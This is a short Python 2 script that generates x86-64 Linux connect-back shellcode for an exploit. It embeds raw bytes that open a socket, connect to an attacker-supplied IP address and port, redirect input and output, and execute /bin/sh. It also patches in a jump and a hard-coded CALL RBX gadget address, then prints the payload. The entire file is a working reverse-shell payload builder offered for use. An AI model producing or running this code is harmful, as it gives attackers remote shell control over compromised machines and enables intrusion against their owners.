#!/usr/bin/python

import struct
import sys
import socket

JMP = '\xeb\x08'
CALL_RBX = '\xe6\x2c\x40\x00\x00\x00\x00\x00'
BREAKPOINT = '\xcc'
shellcode = \
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x89\xc5\x6a\x01" \
"\xfe\x0c\x24\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x89\xef" \
"\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x89\xef\x5e" \
"\xff\xce\x78\x08\x56\x6a\x21\x58\x0f\x05\xeb\xf1\x48\xb8\x2f\x62" \
"\x69\x6e\x2f\x2f\x73\x68\x99\x89\xd6\x52\x50\x48\x89\xe7\x6a\x3b" \
"\x58\x0f\x05\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" \
"\x90\x90\x90"

def replace_into(template, replace, index):
    return template[0:index] + replace + template[index + len(replace):]

if not len(sys.argv) == 3:
    print 'Usage: %s <connectback ip> <port>' % sys.argv[0]

else:
    shellcode = replace_into(shellcode, JMP + CALL_RBX, 86)
    replacement = struct.pack('!HH', socket.ntohs(socket.AF_INET), int(sys.argv[2])) + socket.inet_aton(sys.argv[1])
    shellcode = replace_into(shellcode, replacement, shellcode.find('\x01\x01\x01\x01\x01\x01\x01\x01'))
    sys.stdout.write(shellcode)
